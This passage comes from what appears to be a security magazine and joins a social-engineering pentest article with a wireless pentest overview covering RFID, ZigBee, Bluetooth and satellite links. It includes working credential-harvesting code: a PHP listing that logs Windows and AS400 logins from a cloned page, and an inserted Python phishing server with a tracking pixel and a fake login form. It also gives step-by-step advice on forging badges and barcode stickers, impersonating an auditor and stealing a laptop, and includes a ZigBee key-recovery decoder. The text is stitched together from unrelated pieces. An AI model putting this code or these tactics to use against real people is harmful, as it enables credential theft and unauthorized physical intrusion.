Now we can use a web server installed and configured by us to exploit the XSS vulnerability, or directly inject a frame into the web application; it depends on the attacker's imagination and skills. Remember that this is an authorized evaluation, so for our client it is important not only to log the credentials captured by our attack but also to record the timestamp of each event: when the user read the e-mail, when the fake website was accessed, when information was entered and when the user left our fake website.
With this information we can measure the time taken by the users and by the IT and security areas to handle the incident.
The reason this kind of attack succeeds, in spite of its simplicity, is trust. First the victim sees the corporate domain in the sender address of the attacker's e-mail, which is considered very trustworthy; if the user then follows the link in the e-mail and lands on a copy of the corporate website, the trust only increases.
As a curious fact, in the penetration tests where I performed this kind of attack, the people who detected it were assistants, skilled people who can spot the differences between previous e-mails and the malicious one. In fact, a lot of attacks were detected because of misspellings (Figure 1).
Figure 1. The most common XSS exploitation
Attacking From a Cafeteria
I declare myself a fan of Hak5, and some of their devices are great. One of the most versatile is the WiFi Pineapple (http://hakshop.myshopify.com/products/WiFi-pineapple). With this device it is possible to perform social engineering attacks.
The WiFi Pineapple is a small device running OpenWrt, a Linux distribution for small network devices, together with Jasager, a web interface for controlling the Pineapple. In its simplest attack, the Pineapple option called "Karma" answers every probe request sent by nearby devices when they look for their preferred networks. The Pineapple always accepts these connections, and we can forward the intercepted traffic to another network, for example the Internet, or an intranet if you are testing an internal network.
The WiFi Pineapple also lets us perform DNS spoofing attacks: we can redirect the websites visited by the users to fake websites hosted by us. We copy the index page of any internal or external website, put it on our web server (even on the Pineapple's own web server), modify the HTML and use the form fields to save usernames and passwords. After saving the information we redirect the user to the real site, where a session is started, so the attack is transparent to the user.
On the Pineapple wiki you can find ready-made copies of commonly used pages such as Facebook, Gmail, Yahoo, etc., which can be used to catch users of those public services, or you can use a customized page, depending on your requirements.
Listing 1 shows a snippet of code you can use to capture usernames, passwords or whatever you want.
This simple code was used in a real engagement, together with the WiFi Pineapple, against an internal application. Using this code we captured more than 100 Windows domain and mainframe accounts. Thanks to the nature of the WiFi Pineapple, the attack did not have to be performed from the company facilities: performing it from a cafeteria next door was enough, which avoids the complication of physical access.
The code does not use a DBMS or sophisticated modules; it can even be hosted on the Pineapple's web server, and the attacker can later log in over SSH to review the captured information.
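An added example (not the article's code, nor the Pineapple's) of the timestamped logging that the authorized engagement described earlier requires, covering the same capture-and-redirect flow as the cloned page used with the Pineapple: every request carries a per-target token, each event (mail opened, fake site visited, credentials entered, site left) is recorded with its timestamp, victims are bounced to the real site, and the report computes how long users took at each step and how long it took for the first warning to reach the security team. The paths, field names, token scheme, real-site URL and the replayed engagement are all assumptions of this example.

```python
"""Phishing-campaign event log with timestamps (added example)."""
import base64
from datetime import datetime, timedelta, timezone

# 1x1 transparent GIF served for the tracking pixel (<img src=".../o.gif?t=TOKEN"> in the mail)
PIXEL_GIF = base64.b64decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7")
REAL_SITE = "https://intranet.client.example/login"   # assumed real site victims are bounced to
LOGIN_FORM = ('<form method="post" action="/login"><input type="hidden" name="t" value="{t}">'
              'Windows user <input name="windows"> password '
              '<input name="windows_contra" type="password">'
              '<input type="submit" name="Enviar" value="Enviar"></form>')
EVENTS = ("mail_opened", "site_visited", "creds_entered", "site_left")  # expected order per victim


class Campaign:
    def __init__(self):
        self.targets = {}        # token -> e-mail address of the targeted employee
        self.events = []         # (timestamp, token, event, detail)
        self.reported_at = None  # when IT/security first heard about the mail

    def add_target(self, token, email):
        self.targets[token] = email

    def record(self, token, event, detail="", now=None):
        self.events.append((now or datetime.now(timezone.utc), token, event, detail))

    def handle(self, method, path, params, now=None):
        """Dispatch one HTTP request (query/form fields merged in params); returns (status, headers, body)."""
        token = params.get("t")
        if token not in self.targets:               # unknown token: not one of our targets
            return 404, {}, b"not found"
        if method == "GET" and path == "/o.gif":    # pixel loaded => the mail was opened
            self.record(token, "mail_opened", now=now)
            return 200, {"Content-Type": "image/gif"}, PIXEL_GIF
        if method == "GET" and path == "/login":    # victim followed the link
            self.record(token, "site_visited", now=now)
            return 200, {"Content-Type": "text/html"}, LOGIN_FORM.replace("{t}", token).encode()
        if method == "POST" and path == "/login":   # credentials submitted; bounce to the real site
            self.record(token, "creds_entered",
                        f"{params.get('windows', '')}:{params.get('windows_contra', '')}", now=now)
            return 302, {"Location": REAL_SITE}, b""
        if method == "GET" and path == "/bye":      # beacon fired by the page's unload handler
            self.record(token, "site_left", now=now)
            return 204, {}, b""
        return 404, {}, b"not found"

    def report_to_security(self, now):
        """Note the (earliest) moment a warning reached the IT/security department."""
        if self.reported_at is None or now < self.reported_at:
            self.reported_at = now

    def timeline(self, token):
        """Seconds from mail_opened to each later event for one target."""
        stamps = {ev: ts for ts, tok, ev, _ in self.events if tok == token}
        if "mail_opened" not in stamps:
            return {}
        t0 = stamps["mail_opened"]
        return {ev: (stamps[ev] - t0).total_seconds() for ev in EVENTS if ev in stamps}

    def captured(self):
        """{e-mail: 'user:pass'} for every target who typed credentials."""
        return {self.targets[tok]: d for _, tok, ev, d in self.events if ev == "creds_entered"}

    def detection_delay(self):
        """Seconds between the first mail being opened and the first report to security."""
        opened = [ts for ts, _, ev, _ in self.events if ev == "mail_opened"]
        if not opened or self.reported_at is None:
            return None
        return (self.reported_at - min(opened)).total_seconds()


def demo():
    """Replay a constructed engagement: one victim who logs in, one assistant who reports it."""
    c = Campaign()
    c.add_target("k9f2", "manager@client.example")
    c.add_target("x7q1", "assistant@client.example")
    t = datetime(2013, 5, 6, 9, 0, tzinfo=timezone.utc)
    c.handle("GET", "/o.gif", {"t": "k9f2"}, now=t)
    c.handle("GET", "/login", {"t": "k9f2"}, now=t + timedelta(seconds=40))
    c.handle("POST", "/login", {"t": "k9f2", "windows": "jdoe", "windows_contra": "Spring2013"},
             now=t + timedelta(seconds=75))
    c.handle("GET", "/bye", {"t": "k9f2"}, now=t + timedelta(seconds=76))
    c.handle("GET", "/o.gif", {"t": "x7q1"}, now=t + timedelta(minutes=3))
    c.report_to_security(t + timedelta(minutes=8))  # the assistant spots the misspelling and calls IT
    return c


if __name__ == "__main__":
    c = demo()
    print(c.captured(), c.timeline("k9f2"), c.detection_delay())
```

The per-target token is what makes the timeline attributable without asking victims for anything extra; the same token in the pixel URL and in the hidden form field ties the "mail opened" beacon to the later form submission, and an unknown token is answered with 404 so stray visitors are never logged as targets.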
I have to say that the complexity of the attack is not the important thing here; on the contrary, the important thing is the ease with which a malicious user can gain access to sensitive information and resources on a network without complex tasks such as exploit execution, ARP poisoning or any other technique.
Another important feature of the WiFi Pineapple is its rechargeable battery, so an attacker can leave a Pineapple inside a company to capture information and forget about it for some hours. It would be very hard to locate.
Unauthorized Access
As I said at the beginning, physical security and social engineering tests are closely related. Below I describe some examples in which social engineering attacks are combined with physical access to facilities, with the purpose of extracting information, laptops and devices, or simply of reviewing the security controls implemented by the company.
Figure 2. WiFi Pineapple
Figure 3. Basic MITM using a WiFi Pineapple
Usually the first security control is the identification of a person before granting access to the facilities; it is common to use PVC badges showing the employee's photograph, name, job title, etc.
These badges can be printed at a print shop for approximately $1.50 per badge. We can print whatever information we want and present a badge with our own data at the security checkpoint as if we were an authorized person.
In my experience, even with this kind of badge, access to unauthorized areas can be complicated, mainly when we want to access the main facilities; small facilities and branch offices are easier.
For example, during an evaluation a client asked me to determine how difficult it was to gain access to the bank's facilities. After studying the bank, I determined that access to the main facilities was very, very complex.
The first security control was a policeman at the door: to enter the bank I needed to present a credential and write down my personal information and the serial number of my laptop. This control applied to employees and guests alike; after that I needed to wait for a staff member to sign my access, writing down the purpose of the visit, and the guest had to be escorted by an employee, even to visit the bathroom. Trying to impersonate an employee would fail because of the biometric access control on the doors.
There are techniques to bypass this kind of control, like following another person through a closing door, pretending to be an office boy, etc., but if you have tried these techniques you know they are not very easy.
After my analysis, I determined that access to the main facilities was impossible; however, during a tour with the CSO I saw a branch office, and in each branch office there are servers that relay the local financial operations to the main servers. The physical security controls at the branch offices were poor: the CSO only presented a business card to the manager, said "Hi, I'm the CSO and a member of the board of directors", showed his credential, and the manager offered all kinds of support for his work.
Listing 1. Getting passwords
<?php
// Credential-capture handler for the cloned login page. The form posts the
// fields windows, windows_contra, as400, as400_contra and a submit button
// named Enviar ("Send").
if (isset($_POST['Enviar'])) {
    $windows        = isset($_POST['windows'])        ? $_POST['windows']        : '';
    $windows_contra = isset($_POST['windows_contra']) ? $_POST['windows_contra'] : '';
    $as400          = isset($_POST['as400'])          ? $_POST['as400']          : '';
    $as400_contra   = isset($_POST['as400_contra'])   ? $_POST['as400_contra']   : '';

    // Append one line per victim: windows_user:windows_pass:as400_user:as400_pass
    $fp = fopen("pwds.txt", "a");
    if ($fp) {
        $cadena = $windows . ":" . $windows_contra . ":" . $as400 . ":" . $as400_contra . "\r\n";
        fwrite($fp, $cadena);
        fclose($fp);
    }
?>
<script>
/* "An error occurred in the transaction. Try again later." */
alert('Ocurrio un error en la transaccion\nIntentelo mas tarde');
</script>
<!-- one second later, bounce the victim to the real site -->
<META HTTP-EQUIV="REFRESH" CONTENT="1;URL=http://www.client.com">
<?php
}
?>
After I saw that, I printed a PVC badge with my photograph, my name and the job title "security auditor". I also printed business cards with the same data. Next I went to a random branch office, dressed in a suit and tie, and asked for the manager; I showed him my badge and gave him a business card. I explained that I was performing an audit and that as part of it I needed access to the server. The manager, very friendly, gave me access to the servers.
During my visit I performed two tests. First I asked an employee for access to the banking system using his username and password, which were domain credentials; very friendly again, he gave me his credentials on a post-it note.
Then I asked for access to the rack where the server and the network devices were. Employees at the local branch office never perform any operation on the server, but sometimes the support area calls them for help: to avoid travelling from the main facilities to every branch office, the support area created generic users and asks the local employees to perform easy tasks such as rebooting the server, shutting down devices, etc. I asked the manager for this generic user, and he gave me another post-it note.
I started a little reconnaissance of the network. Using an old Windows Server 2003 I dumped the Windows hashes and looked at the installed software, where I found a SQL Server 2005. The generic user was in a built-in group, so I accessed the database and reviewed its contents in detail: I found all the operations performed by this branch office.
This kind of attack, very focused, did not represent the same risk as entering the main facilities, yet I basically accessed more sensitive information than I could have accessed at the main facilities. While at the main facilities the security area had implemented biometric controls, NAC, cameras, etc., at the branch offices all the security was broken by the manager's trust in my fake badge and business cards. With my approach I got more network and software details, and even domain users, with which to start a complex attack on their infrastructure.
Figure 4. Samples of printed credentials
At datacenters it is common to attempt computer and laptop extractions to evaluate the security controls, and afterwards to review the device for disk encryption, password policy, BIOS hardening, etc.
At datacenters, and in companies in general, there are logs of the electronic devices brought in by both employees and guests; one common way to control this is a sticker with a barcode printed on it. So I went to a print shop to print some stickers; the cost was around $200 for 50 stickers.
I entered the datacenter facilities as any guest would have done, walked to the main conference room and stole a computer there. I quickly left the datacenter, and at the security checkpoint a policeman asked me for the barcode. He scanned my fake sticker and obviously the system showed an error; I told him "maybe it's because I'm new here", an excellent answer: the policeman apologized and told me "yes, this error is very common with new employees, please write down the serial number and I will check it later".
I reviewed the computer: it was used by all the managers and directors to present slides, and I found financial reports, information about new projects, new products, weaknesses, and much more.
It was very easy to extract a laptop from the datacenter, and actually all the computers there had disk encryption, but this one, a shared computer to which everybody transferred their files for presentations, did not.
Summary
I could spend a long time writing about my professional experience with social engineering tests, and maybe all of you have your own stories, many of them very different depending on your country, your approach and the maturity level of the security controls implemented by companies, governments and organizations.
However, I have some conclusions that hold regardless of all those differences, and these conclusions go beyond people's trust and goodwill.
Trust and goodwill in people are good, but authority is better. People feel good helping others, but the reaction is faster if the request involves someone higher in the hierarchical structure of the company. As I showed in the bank scenario, the manager was very friendly with me because I presented myself as an important employee from the corporate facilities; this generates a feeling of responsibility in the people involved in the attack, and as a result he offered all the information he could. However, you need to be very careful not to exaggerate: it is also normal that someone who feels intimidated by another person looks for mistakes in his behaviour as a reason not to offer support. It is a human reaction; you need to be polite but firm, like a boss.
Don't limit your imagination to simple attacks; use all the information gathered to perform complex attacks. Don't attack random users: take care selecting a sample of users from the information gathered previously, take your time on the fake images and corporate formats, and take care with spelling and grammar; if possible don't use scripts to send the e-mails, write each e-mail by hand and personalize it for each target.
When you present the test results, remember to orient them to the business. The important thing for your clients is not a list of users and passwords or other sensitive information, but the impact on their business, the strategy needed to remove the weaknesses, and its total cost.
Collect all the information you can. Just as a penetration test has active and passive information gathering phases, a social engineering test also has an information gathering phase in which you need to obtain as much information as possible about the security controls and processes in place. Tools like Maltego and FOCA can derive, from public information, private information that is useful for your tests: names, key people in the company, telephone numbers, addresses, documents, templates, e-mail addresses, etc.
Always orient your results to the business. I am being very repetitive, but it is important, mainly because companies pay a lot of money for this kind of test in order to know their weaknesses, and beyond that to design a strategy to avoid them in the future; so it is necessary to be detailed in the descriptions of access methods, human errors, security awareness, the security controls implemented, and nice-to-have recommendations.
CARLOS A. LOZANO
Carlos A. Lozano has been working as Chief Technology Officer at blue Mammut Computer Security Services, a small company focused on application and network security, for the past 6 months; before that he worked as a security advisor at several companies specializing in security. He founded the BugCON Security Conference, the largest security conference in Mexico, and he is interested in exploitation techniques, research and reverse engineering.
Wireless Penetration Testing
Beyond the IEEE 802.11 family of standards
Wireless penetration testing covers a large family of wireless protocols. Usually penetration testing companies offer their customers only WiFi (IEEE 802.11 family of standards) penetration tests, leaving out the other widespread wireless technologies. Wireless protocols like Bluetooth, ZigBee, RFID, NFC, GPRS/EDGE/HSPA and SAT are often used by companies in mission-critical environments, but their security problems are often upstaged by business needs until a threat agent teaches them how expensive a breach is in terms of money and reputation.
While end users have discovered the joys and sorrows of wireless communications in the last ten years, industry has been using these technologies for at least thirty years. At the beginning their devices were interconnected using very basic proprietary RF technologies meant to transmit a little control data, but over the years systems have evolved, adopting ever more sophisticated technologies for many different purposes: wireless technology was initially born from the need to manage devices and sensors regardless of their distance from the control station, and it has become almost ubiquitous in companies. Despite the technological evolution, what has remained almost the same is the approach to designing the systems that use these technologies: the assumption made by engineers who decide to use wireless communications in their systems is that there is no possible hostility from the users or from the parties joining the wireless communications. We know that is simply not true; in the Stuxnet era even my mother could be hostile without knowing it. And in the rare cases where the engineers designed their systems assuming that the user could be hostile, they fail because too often security is implemented through obscurity instead of using best practices and well-known security protocols and algorithms.
In this article we present an overview of the security problems and penetration testing techniques related to non-WiFi (IEEE 802.11 family of standards) wireless technologies; the term wireless in the following paragraphs should be read in this sense.
The Big Deal in Wireless Communications Security
The undeniable big problem in wireless communications is the shared communication channel (the air). The sentence may sound trivial, but during the development of systems that use wireless technologies engineers often seem to forget this fundamental fact. I say this because in my work experience, even for systems equipped with wireless technologies that provide security features, the security features were switched off. The point is not purely technological; it lies in the technical background of the system designers, which has survived unchanged over the years of technological evolution.
The paradigm adopted in the design of this kind of system is "it has to work" rather than "it must work securely", because of a common belief among "Triassic" designers and the companies that rely on their convictions: "who do you think would be interested in, or able to, break into our super-tested proprietary system?" The problem becomes more serious considering that such technologies are usually used in costly systems that are resistant to change.
Imagine a company that has just invested hundreds of thousands of euros to deploy a system; imagine telling them that their system is intrinsically insecure. How do you think they would react?
They will certainly not change anything unless it is practically demonstrated that a threat agent can damage their business. Selling wireless security services in this scenario is difficult, and it is even more difficult to identify practical and cost-effective solutions, but our experience is that once you find the key to making your customers understand how risky it is to keep operating a system that relies on insecure wireless technologies, they will promote actions to mitigate the risks, involving the security consultants in the review of the whole system.
So what is the key to making the customer understand the security risks of poorly designed devices equipped with wireless technologies? In my experience, penetration tests in these environments have always been planned and executed following these principles:
Pre-Sales / Sales
The sale of the test is approached with specific know-how on the topic. We try to make the customer aware of the threats affecting this kind of technology without being "terrorists". First, in each sales meeting we try to capture the needs of the customer's business and work out how a threat agent could affect its business model. Our testing idea is then discussed with the customer to identify exactly what it needs. From our point of view it is crucial that the proposal is both technical, in its analysis of the attack vectors to test, and business oriented, so that the customer understands what the test is for. In general, keep the proposal consistent with an approach inspired by real-life security issues rather than academic concerns.
Penetration Test Plan
The definition of the test plan is important for every kind of test. In wireless testing it is even more important because, unless your company has its own logistics division equipped with trucks to carry all the devices and equipment needed to test the wireless infrastructure, you have to define which technologies will be tested and which kind of test will be performed. It is really important that an analyst highly skilled in wireless communications is involved in this phase. To give a practical example, the wrong antenna choice could compromise your analysis. A different story is a black-box test, where you definitely need a truck to carry all the devices needed to analyze unknown wireless signals. I definitely do not recommend planning such a generic wireless test unless you and the customer are really aware of the complexity and the trouble you may have to face.
Penetration Test Execution
Apart from methodologies, which are always important in penetration testing, remember that dealing with wireless technologies is not a kiddie game, so please consider your safety and the safety of the people around you while operating wireless devices (especially high-power ones). Usually we try to carry out this kind of penetration test in a laboratory environment where we can take all the necessary precautions in terms of safety and security, but if the customer requires the analysis in a production environment we advise them of the potential security and safety risks. Moreover, before starting the analysis we hold a meeting with all the customer staff working within range of our wireless devices, to inform them of the safety measures to adopt while we work on the penetration test. In a production environment you also have to keep in mind that your test may affect more devices than those in your target scope, so you have to be very careful in evaluating every possible side effect of the analysis. With this in mind and all the needed precautions, your analysis can be done without harming anyone or anything outside your target scope.
Wireless Penetration Testing Domains
Depending on the wireless technology being tested, the testing strategy will verify certain information security aspects besides the technology-specific vulnerabilities. In general, during a wireless penetration test you have to verify, where applicable to the technology, at least the following security domains:
Confidentiality of the Information
Because of the shared communication channel, the confidentiality of the information should be verified during a penetration test. The level of confidentiality and the impact depend on the technology being tested, but you have to verify that the transmitted information is accessible only to those authorized to access it. For example, imagine an HTTP conversation over an asymmetric satellite link (e.g. a DVB satmodem where the upstream channel goes over the Internet and the downstream channel over the air): if the channel is not properly protected, a threat agent could read the server's responses, which contain sensitive information (cookies, a clear-text password returned in a later response, company information contained in the response pages, etc.).
Communications Integrity
It is fundamental to ensure that information is not corrupted in transit. In particular, during a test you have to check that it is not possible to inject forged traffic into a communication, or to replay part of the captured traffic on the same channel.
Authentication and Authorization
As with any other communication technology, for wireless ones you have to ensure that the authentication and authorization mechanisms work properly. In wireless communications these controls are shared between the parties, so you have to check that each player involved in the communication is doing its job. For example, in a typical "private" mobile network (where the customer has its own APN) the telco provides the authorization services and the customer implements the authentication ones. A lack of authorization is shown by the ability to reach the "private" mobile network with a generic (U)SIM not owned by the customer, because the CUG (closed user group) is missing.
Depending on the technology, the way you perform the test may vary both in the tools used and in the area attacked. In the next paragraphs we briefly cover the tools, devices and techniques used to perform a wireless penetration test.
RFID Penetration Testing
RFID technology was born in the military field, where it was first used as an IFF (identification friend or foe) transponder, an identification system to determine whether a target is friend or foe. Nowadays this technology has many applications such as smart cards, cars, inventory tracking in retail stores, chips for animals, corporate badges and so on. In a corporate environment the following hardware components are usually part of the penetration testing process: RFID readers, RFID tags and RFID antennas. Figure 1 shows a typical RFID architecture. RFID is usually used in two ways:
Unique ID (UID) Transponders
A transponder operating in this mode uses the LF band (100 to 150 kHz) for the wireless transmission. The transponder is programmed by the manufacturer and the chip comes with its own identification number written in memory. When the transponder is within range of the reader, the memory content is transmitted to it. In this operating mode there is no authentication of the origin of the communication, so the transponder sends its data to anybody and the reader accepts data from anybody.
MIFARE
A transponder operating in this mode uses the HF band (13.56 MHz) for the wireless transmission. In this mode there are basically two ways of use: the first is equivalent to the Unique ID (UID) mode, the second provides a "cryptographic" technology used to mutually authenticate the transponder and the reader.
Unfortunately for those who adopted these technologies, both operating modes have been totally compromised, leaving several attack scenarios open to a threat agent. The following are some of the typical attack scenarios you can analyze during a penetration test.
Relay Attacks
In this scenario a threat agent performs a man-in-the-middle attack: using a device placed between a legitimate RFID tag and reader, the threat agent is able to intercept and modify the radio signal.
Figure 1. Typical RFID architecture
Network/Transport Layer
This scenario includes the attacks based on the way data is exchanged between the entities (tags, readers) of an RFID network. We have to distinguish attacks against tags, readers and the network protocol. Against tags, a threat agent could both clone and spoof the victim's tags. Against readers we could choose impersonation or eavesdropping attacks (an unauthorized user uses an antenna to record RFID communications). Also consider that RFID systems are often connected to back-end databases and network devices, so they are susceptible to the same vulnerabilities as general-purpose network devices.
Application Layer
In this scenario a threat agent takes advantage of the aforementioned attacks to exploit back-end software vulnerabilities: the RFID tag becomes the vector for classic attacks such as buffer overflows, SQL injection and so on, depending on the back-end business application. Depending on your electronics skills you can build your own professional RFID penetration test kit for between 250 and 1500 €. For example, on the Internet you can find many tutorials to start playing with RFID using the Proxmark III [1], a general-purpose RFID device.
ZigBee Penetration Testing
ZigBee (built on IEEE 802.15.4, which defines the physical and MAC layers) is a wireless transmission technology that operates in the 868/915 MHz and 2.4 GHz frequency ranges, originally developed in 1998. ZigBee was designed as a short-range protocol to be used in embedded devices thanks to its simplicity. Figure 2 shows the ZigBee protocol stack.
There are many implementation scenarios, but the built-in protocol supports both mesh and star network topologies. In a typical ZigBee network there are two types of devices: the Target and the Controller. The first device type is responsible for the creation and coordination of the PAN; the second device type can join the network created by the Target by pairing with it. Although the ZigBee protocol stack has been designed with security in mind, researchers have found vulnerabilities that allow a threat agent to harm a ZigBee PAN. The following are the known ZigBee vulnerabilities you can analyse during a penetration test:
Physical Attack
Many ZigBee devices use a hard-coded encryption key to encrypt the network traffic. During the boot process the key is copied from flash memory to RAM, which lets a threat agent with physical access to the device retrieve it. Consider planning this kind of test only in a test environment, since you will have to disassemble the device in order to connect the probes needed to access the memory.
Key Provisioning Attack
ZigBee supports over-the-air (OTA) delivery of the keys used to encrypt the network traffic. Large ZigBee networks typically rely on OTA key delivery because of the ease of updating, in order to keep transmissions protected. Unfortunately, due to a flaw in the protocol design (the cryptographic keys are sent unencrypted), this mechanism offers almost no protection against a threat agent: once the keys have been captured, the agent is able to decrypt the PAN traffic.
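As an added example (not code from the original article), the following Python decoder walks an 802.15.4 frame from the MAC header through the ZigBee NWK header to the APS command layer and reports a Transport Key command whose key travels in the clear, which is exactly what a sniffer would be looking for during the key provisioning test just described. The two frames are constructed for illustration (a coordinator at short address 0x0000 sending the network key to a joining device 0x3344 on PAN 0x1a62), the FCS is omitted and the 16-byte key is a placeholder value; the header layouts are the public ones from IEEE 802.15.4 and the ZigBee specification.

```python
import struct
from dataclasses import dataclass

# Field layouts follow IEEE 802.15.4 (MAC header) and the ZigBee specification
# (NWK header, APS command frames). Both sample frames below are constructed, not captured.
MAC_FRAME_DATA = 0x1                 # 802.15.4 frame type: data
ADDR_NONE, ADDR_SHORT, ADDR_EXT = 0x0, 0x2, 0x3
NWK_FRAME_DATA = 0x0                 # NWK frame type: data (carries an APS frame)
APS_FRAME_COMMAND = 0x1              # APS frame type: command
APS_CMD_TRANSPORT_KEY = 0x05         # APS command identifier: Transport Key
KEY_TYPES = {0x00: "trust-center master", 0x01: "standard network",
             0x03: "application link", 0x04: "trust-center link", 0x05: "high-security network"}


@dataclass
class TransportKey:
    key_type: str
    key_hex: str
    key_seq: int        # network key sequence number (-1 when the key type has none)
    dest_ieee: str
    src_ieee: str       # empty when the key type does not carry a source address


def _ieee(raw: bytes) -> str:
    # Extended addresses are sent little-endian; show them most-significant byte first.
    return ":".join(f"{b:02x}" for b in reversed(raw))


def _mac_header(frame: bytes):
    """Return (frame_type, security_enabled, header_length) for an 802.15.4 MAC header."""
    fcf, = struct.unpack_from("<H", frame, 0)
    dst_mode, src_mode = (fcf >> 10) & 0x3, (fcf >> 14) & 0x3
    off = 3                                             # FCF (2) + sequence number (1)
    if dst_mode != ADDR_NONE:
        off += 2 + (8 if dst_mode == ADDR_EXT else 2)   # destination PAN + address
    if src_mode != ADDR_NONE:
        if not fcf & 0x0040:                            # PAN ID compression bit clear
            off += 2                                    # source PAN present
        off += 8 if src_mode == ADDR_EXT else 2
    return fcf & 0x7, bool(fcf & 0x0008), off


def _nwk_header(frame: bytes, off: int):
    """Return (frame_type, security_enabled, header_end) for a ZigBee NWK header."""
    fcf, = struct.unpack_from("<H", frame, off)
    if fcf & 0x0400:
        raise ValueError("source-routed NWK frame not handled by this example")
    end = off + 8                                       # FCF, dst, src, radius, sequence
    end += 8 if fcf & 0x0800 else 0                     # destination IEEE address
    end += 8 if fcf & 0x1000 else 0                     # source IEEE address
    end += 1 if fcf & 0x0100 else 0                     # multicast control
    return fcf & 0x3, bool(fcf & 0x0200), end


def inspect_frame(frame: bytes) -> dict:
    """Walk MAC -> NWK -> APS and report a Transport Key command sent without security."""
    report = {"mac_secured": None, "nwk_secured": None, "aps_secured": None, "leak": None}
    mac_type, mac_sec, off = _mac_header(frame)
    report["mac_secured"] = mac_sec
    if mac_type != MAC_FRAME_DATA or mac_sec:
        return report
    nwk_type, nwk_sec, off = _nwk_header(frame, off)
    report["nwk_secured"] = nwk_sec
    if nwk_type != NWK_FRAME_DATA or nwk_sec:
        return report                                   # encrypted or not an APS payload
    aps_fc = frame[off]
    report["aps_secured"] = bool(aps_fc & 0x20)
    if (aps_fc & 0x3) != APS_FRAME_COMMAND or report["aps_secured"] or aps_fc & 0x80:
        return report                                   # data/ack frame, secured, or extended header
    payload = frame[off + 2:]                           # skip APS frame control and APS counter
    if payload[0] != APS_CMD_TRANSPORT_KEY:
        return report
    key_type, key, tail = payload[1], payload[2:18], payload[18:]
    name = KEY_TYPES.get(key_type, f"0x{key_type:02x}")
    if key_type in (0x01, 0x05):                        # network key: seq + dest IEEE + src IEEE
        report["leak"] = TransportKey(name, key.hex(), tail[0], _ieee(tail[1:9]), _ieee(tail[9:17]))
    else:                                               # other types: dest/partner IEEE comes first
        report["leak"] = TransportKey(name, key.hex(), -1, _ieee(tail[0:8]), "")
    return report


# Constructed sample: coordinator 0x0000 sends the standard network key to joining
# device 0x3344 on PAN 0x1a62 with the NWK and APS security bits clear. FCS omitted.
CLEARTEXT_TRANSPORT_KEY = bytes.fromhex(
    "418810621a44330000"                        # MAC: data frame, PAN compressed, short addresses
    "0800443300001e5a"                          # NWK: data, protocol version 2, security = 0
    "0107"                                      # APS: command frame, counter 7, security = 0
    "0501a0a1a2a3a4a5a6a7a8a9aaabacadaeaf"      # Transport Key, type standard network, 16-byte key
    "00" "0807060504030201" "efcdab8967452301")  # key sequence, dest IEEE (LE), src IEEE (LE)

# Same shape with the NWK security bit set: what follows is an auxiliary security header,
# ciphertext and MIC, so the decoder stops at the NWK header.
ENCRYPTED_FRAME = bytes.fromhex(
    "418810621a44330000" "0802443300001e5b"
    "2801000000efcdab896745230100" "3b9ac0ffee42")

if __name__ == "__main__":
    for label, frame in (("cleartext", CLEARTEXT_TRANSPORT_KEY), ("encrypted", ENCRYPTED_FRAME)):
        print(label, inspect_frame(frame))
```

Run over a capture, the report separates the three cases a tester has to tell apart: the payload is protected at the MAC or NWK layer (nothing to read without the key), it is an APS command protected with APS security, or it is a Transport Key command with no security at all, in which case the key, its sequence number and both extended addresses are recovered directly from the frame.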
Replay Attack
ZigBee has only very basic replay protection, so a threat agent able to intercept the network traffic can inject any previously observed packet until the key is rotated. Be careful while playing with this, especially in a production environment: since you have no idea of what you are injecting, consider that you can cause service disruption or even worse damage.
Figure 2. Zigbee Protocol Stack, Source Wikipedia
PENTESTING TRICKS
The physical attack on ZigBee devices can be carried out using the Bus Pirate [2] or GoodFET [3]. The other attacks can be simulated using KillerBee [4] and the suggested ZigBee hardware. Depending on your electronics skills you can build your own professional ZigBee penetration test kit for anywhere from 100 up to 350 €.
Bluetooth Penetration Testing
Bluetooth (IEEE 802.15.1) is a wireless transmission technology that operates in the 2.4 GHz frequency range. Bluetooth was designed as a short-range protocol with low power consumption. The radio technology used by Bluetooth is known as frequency-hopping spread spectrum, which splits the data being sent to other devices and transmits it over up to 79 frequencies. The Bluetooth protocol stack is anything but simple: it can operate in several different ways and the testing scenarios are as wide as the protocol specifications. While you can find several excellent resources on the Internet regarding Bluetooth security and penetration testing (e.g. [5][6]), I will focus on the analysis of the security testing scenarios related to the embedded devices and industrial automation world. The following are the known Bluetooth vulnerabilities you can analyse during a penetration test:
Pairing Eavesdropping
Depending on the Bluetooth version, PIN/Legacy Pairing and LE Pairing are susceptible to eavesdropping attacks. A threat agent able to collect all the pairing frames can recover the secret key(s), which allows device impersonation and data decryption.
PIN Enumeration
Often, especially with older Bluetooth versions, the PIN used to pair with a device is weak. Since the pairing mechanism has no brute-force prevention, and considering that the PIN is often a number of only 4-5 digits, it can be trivial for a threat agent to retrieve the PIN used for pairing the devices.
Secure Simple Pairing Attacks
SSP is a method used to establish a secure connection between Bluetooth devices. Despite the secure mechanism, a threat agent could abuse some of the protocol's flaws to perform a man-in-the-middle attack.
Application Layer
In this scenario a threat agent takes advantage of the aforementioned attacks to exploit back-end or device software vulnerabilities. Bluetooth becomes the vector for classic attacks such as buffer overflows and so on, depending on the back-end business application.
Because of the frequency hopping, the hardware investment needed to intercept Bluetooth communications can be expensive. There are a couple of cheap alternatives that work well with older Bluetooth versions [5], but a professional solution [7] could be the only choice in certain scenarios.
SAT Penetration Testing
Satellite link communication is probably one of the oldest wide-band technologies adopted by companies. Originally developed for military use, this technology has evolved and become more accessible. Nowadays DVB-S2 is the de facto standard (ratified by ETSI as EN 302 307) for audio, video and data connections via satellite. Data connections using the DVB technology are implemented in the following ways:
Sat Modem
The client uses only the satellite downstream; it is not able to transmit data over the sky. The requests are made through the Internet, usually using a PSTN or an HSPA connection, and the responses are received through the satellite link.
Astro Modem
Both the client and the provider exchange information using the satellite link. The requests are sent by the client to the satellite, which forwards them to the provider. The responses follow the same path.
The following are some of the typical attack scenarios that you can analyse during a penetration test:
Data Analysis
Depending on the link scenario the impact of this may vary: in the sat modem case a threat agent can intercept only the responses, since the requests travel over the terrestrial connection. Usually this kind of connection is not encrypted, thus all the unprotected information can be accessed by everyone within the satellite's coverage.
